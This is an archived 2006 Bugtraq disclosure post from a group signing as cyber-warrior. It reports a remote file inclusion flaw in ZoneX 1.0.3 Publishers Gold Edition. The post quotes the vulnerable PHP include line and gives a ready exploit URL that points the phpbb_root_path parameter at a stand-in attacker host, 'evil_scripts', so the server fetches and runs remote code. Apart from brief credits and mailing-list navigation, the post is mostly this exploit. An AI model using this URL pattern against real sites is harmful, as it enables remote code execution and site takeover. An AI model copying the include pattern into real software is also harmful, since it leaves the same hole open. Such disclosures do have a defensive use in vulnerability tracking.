[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability
From: x0r0n@xxxxxxxxxxx
Date: 3 Aug 2006 20:04:16 -0000

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

#ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion Vulnerability     

- 

#Author: xoron

-

#script: ZoneX 1.0.3 - Publishers Gold Edition 

-

#Class : Remote

-

#cont@ct: x0r0n[at]hotmail[dot]com

-

#CODE:    include($phpbb_root_path . 'newsletter/scripts/subscriptions.' 
.$phpEx)

-

#Exploit:
http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?


-

#Thanx : WWW.CYBER-WARRiOR.ORG

-

#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

Prev by Date: [ GLSA 200608-04 ] Mozilla Thunderbird: Multiple vulnerabilities
Next by Date: [security bulletin] HPSBUX02137 SSRT051024 rev.1 - HP-UX Running Xserver Local Execution of Arbitrary Code, Privilege Elevation
Previous by thread: [ GLSA 200608-04 ] Mozilla Thunderbird: Multiple vulnerabilities
Next by thread: [security bulletin] HPSBUX02137 SSRT051024 rev.1 - HP-UX Running Xserver Local Execution of Arbitrary Code, Privilege Elevation
Index(es):
- Date
- Thread